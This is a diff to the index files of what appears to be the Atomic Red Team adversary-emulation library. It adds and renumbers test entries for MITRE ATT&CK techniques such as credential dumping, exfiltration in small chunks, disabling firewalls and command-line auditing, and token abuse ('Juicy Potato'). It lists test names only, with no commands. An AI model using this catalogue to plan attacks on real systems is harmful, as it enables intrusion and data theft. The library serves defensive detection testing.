+credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1008,6 +1025,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1086,6 +1104,7 @@ discovery,T1135,Network Share Discovery,9,WinPwn - shareenumeration,987901d1-5b8
 discovery,T1135,Network Share Discovery,10,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
+discovery,T1120,Peripheral Device Discovery,3,Peripheral Device Discovery via fsutil,424e18fd-48b8-4201-8d3a-bf591523a686,command_prompt
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
 discovery,T1082,System Information Discovery,7,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
 discovery,T1082,System Information Discovery,9,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
@@ -1134,6 +1153,7 @@ discovery,T1049,System Network Connections Discovery,1,System Network Connection
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
+discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
@@ -1237,6 +1257,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
+exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
@@ -18,6 +18,7 @@
  - Atomic Test #11: Rundll32 with Ordinal Value [windows]
  - Atomic Test #12: Rundll32 with Control_RunDLL [windows]
  - Atomic Test #13: Rundll32 with desk.cpl [windows]
+  - Atomic Test #14: Running DLL with .init extension and function [windows]
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
  - Atomic Test #1: Malicious PAM rule [linux]
@@ -86,7 +87,8 @@
  - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
  - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -300,6 +302,7 @@
  - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
  - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
  - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
+  - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
  - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -313,71 +316,72 @@
  - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
  - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
  - Atomic Test #3: Modify registry to store logon credentials [windows]
-  - Atomic Test #4: Add domain to Trusted sites Zone [windows]
-  - Atomic Test #5: Javascript in registry [windows]
-  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
-  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
-  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
-  - Atomic Test #9: Disable Windows Registry Tool [windows]
-  - Atomic Test #10: Disable Windows CMD application [windows]
-  - Atomic Test #11: Disable Windows Task Manager application [windows]
-  - Atomic Test #12: Disable Windows Notification Center [windows]
-  - Atomic Test #13: Disable Windows Shutdown Button [windows]
-  - Atomic Test #14: Disable Windows LogOff Button [windows]
-  - Atomic Test #15: Disable Windows Change Password Feature [windows]
-  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
-  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
-  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
-  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
-  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
-  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
-  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
-  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
-  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
-  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
-  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
-  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
-  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
-  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
-  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
-  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
-  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
-  - Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
-  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
-  - Atomic Test #35: Disable Windows Toast Notifications [windows]
-  - Atomic Test #36: Disable Windows Security Center Notifications [windows]
-  - Atomic Test #37: Suppress Win Defender Notifications [windows]
-  - Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
-  - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
-  - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
-  - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
-  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
-  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
-  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
-  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
-  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
-  - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
-  - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
-  - Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
-  - Atomic Test #50: Disable Win Defender Notification [windows]
-  - Atomic Test #51: Disable Windows OS Auto Update [windows]
-  - Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
-  - Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
-  - Atomic Test #54: Do Not Connect To Win Update [windows]
-  - Atomic Test #55: Tamper Win Defender Protection [windows]
-  - Atomic Test #56: Snake Malware Registry Blob [windows]
-  - Atomic Test #57: Allow Simultaneous Download Registry [windows]
-  - Atomic Test #58: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
-  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
-  - Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
-  - Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
-  - Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
-  - Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
-  - Atomic Test #66: Enable Proxy Settings [windows]
-  - Atomic Test #67: Set-Up Proxy Server [windows]
-  - Atomic Test #68: RDP Authentication Level Override [windows]
+  - Atomic Test #4: Use Powershell to Modify registry to store logon credentials [windows]
+  - Atomic Test #5: Add domain to Trusted sites Zone [windows]
+  - Atomic Test #6: Javascript in registry [windows]
+  - Atomic Test #7: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #9: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #10: Disable Windows Registry Tool [windows]
+  - Atomic Test #11: Disable Windows CMD application [windows]
+  - Atomic Test #12: Disable Windows Task Manager application [windows]
+  - Atomic Test #13: Disable Windows Notification Center [windows]
+  - Atomic Test #14: Disable Windows Shutdown Button [windows]
+  - Atomic Test #15: Disable Windows LogOff Button [windows]
+  - Atomic Test #16: Disable Windows Change Password Feature [windows]
+  - Atomic Test #17: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #18: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #26: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #27: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #31: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #32: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #33: Windows Powershell Logging Disabled [windows]
+  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
+  - Atomic Test #35: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
+  - Atomic Test #36: Disable Windows Toast Notifications [windows]
+  - Atomic Test #37: Disable Windows Security Center Notifications [windows]
+  - Atomic Test #38: Suppress Win Defender Notifications [windows]
+  - Atomic Test #39: Allow RDP Remote Assistance Feature [windows]
+  - Atomic Test #40: NetWire RAT Registry Key Creation [windows]
+  - Atomic Test #41: Ursnif Malware Registry Key Creation [windows]
+  - Atomic Test #42: Terminal Server Client Connection History Cleared [windows]
+  - Atomic Test #43: Disable Windows Error Reporting Settings [windows]
+  - Atomic Test #44: DisallowRun Execution Of Certain Applications [windows]
+  - Atomic Test #45: Enabling Restricted Admin Mode via Command_Prompt [windows]
+  - Atomic Test #46: Mimic Ransomware - Enable Multiple User Sessions [windows]
+  - Atomic Test #47: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
+  - Atomic Test #48: Event Viewer Registry Modification - Redirection URL [windows]
+  - Atomic Test #49: Event Viewer Registry Modification - Redirection Program [windows]
+  - Atomic Test #50: Enabling Remote Desktop Protocol via Remote Registry [windows]
+  - Atomic Test #51: Disable Win Defender Notification [windows]
+  - Atomic Test #52: Disable Windows OS Auto Update [windows]
+  - Atomic Test #53: Disable Windows Auto Reboot for current logon user [windows]
+  - Atomic Test #54: Windows Auto Update Option to Notify before download [windows]
+  - Atomic Test #55: Do Not Connect To Win Update [windows]
+  - Atomic Test #56: Tamper Win Defender Protection [windows]
+  - Atomic Test #57: Snake Malware Registry Blob [windows]
+  - Atomic Test #58: Allow Simultaneous Download Registry [windows]
+  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
+  - Atomic Test #60: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
+  - Atomic Test #61: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #62: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #63: Scarab Ransomware Defense Evasion Activities [windows]
+  - Atomic Test #64: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
+  - Atomic Test #65: Disable Remote Desktop Security Settings Through Registry [windows]
+  - Atomic Test #66: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
+  - Atomic Test #67: Enable Proxy Settings [windows]
+  - Atomic Test #68: Set-Up Proxy Server [windows]
+  - Atomic Test #69: RDP Authentication Level Override [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -485,6 +489,7 @@
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
  - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
@@ -492,7 +497,7 @@
  - Atomic Test #2: Create Hidden User using IsHidden option [macos]
  - Atomic Test #3: Create Hidden User in Registry [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #2: Disable history collection (freebsd) [linux]
  - Atomic Test #3: Mac HISTCONTROL [macos, linux]
@@ -503,6 +508,8 @@
  - Atomic Test #8: Setting the HISTFILE environment variable [linux]
  - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
  - Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
+  - Atomic Test #11: Disable Windows Command Line Auditing using reg.exe [windows]
+  - Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet [windows]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -986,6 +993,7 @@
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
  - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
@@ -1223,7 +1231,8 @@
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1610 Deploy a container](../../T1610/T1610.md)
  - Atomic Test #1: Deploy Docker container [containers]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
+  - Atomic Test #1: AutoIt Script Execution [windows]
 - [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
  - Atomic Test #1: ExecIntoContainer [containers]
  - Atomic Test #2: Docker Exec Into Container [containers]
@@ -1344,7 +1353,8 @@
 - [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
  - Atomic Test #1: ListCronjobs [containers]
  - Atomic Test #2: CreateCronjob [containers]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -1473,7 +1483,8 @@
  - Atomic Test #4: Active Directory Create Admin Account [linux]
  - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)
+  - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
  - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1670,7 +1681,8 @@
  - Atomic Test #4: DNS C2 [windows]
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1071 Application Layer Protocol](../../T1071/T1071.md)
+  - Atomic Test #1: Telnet C2 [windows]
 - [T1219 Remote Access Software](../../T1219/T1219.md)
  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
  - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
@@ -1683,6 +1695,7 @@
  - Atomic Test #9: UltraViewer - RAT Execution [windows]
  - Atomic Test #10: UltraVNC Execution [windows]
  - Atomic Test #11: MSP360 Connect Execution [windows]
+  - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1756,7 +1769,9 @@
  - Atomic Test #27: Linux Download File and Run [linux]
  - Atomic Test #28: Nimgrab - Transfer Files [windows]
  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
+  - Atomic Test #1: Steganographic Tarball Embedding [windows]
+  - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [linux, macos]
@@ -1776,6 +1791,7 @@
  - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
  - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
  - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
+  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
  - Atomic Test #1: Screencapture [macos]
  - Atomic Test #2: Screencapture (silent) [macos]
@@ -1938,6 +1954,7 @@
  - Atomic Test #5: SUDO Brute Force - Debian [linux]
  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
  - Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
+  - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -2152,6 +2169,7 @@
  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
@@ -2286,6 +2304,7 @@
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
  - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
  - Atomic Test #2: WinPwn - printercheck [windows]
+  - Atomic Test #3: Peripheral Device Discovery via fsutil [windows]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
  - Atomic Test #1: System Information Discovery [windows]
  - Atomic Test #2: System Information Discovery [macos]
@@ -2375,6 +2394,7 @@
  - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
 - [T1654 Log Enumeration](../../T1654/T1654.md)
  - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
+  - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows]
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
  - Atomic Test #1: Process Discovery - ps [linux, macos]
@@ -2729,6 +2749,7 @@
  - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
  - Atomic Test #1: Data Transfer Size Limits [macos, linux]
+  - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
 - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
@@ -146,7 +146,7 @@
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #2: Disable history collection (freebsd) [linux]
  - Atomic Test #3: Mac HISTCONTROL [macos, linux]
@@ -365,7 +365,7 @@
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
  - Atomic Test #14: whois file download [linux, macos]
  - Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [linux, macos]
@@ -108,7 +108,7 @@
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
  - Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #3: Mac HISTCONTROL [macos, linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -300,7 +300,7 @@
  - Atomic Test #5: sftp remote file copy (push) [linux, macos]
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
  - Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [linux, macos]
@@ -93,7 +93,7 @@
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
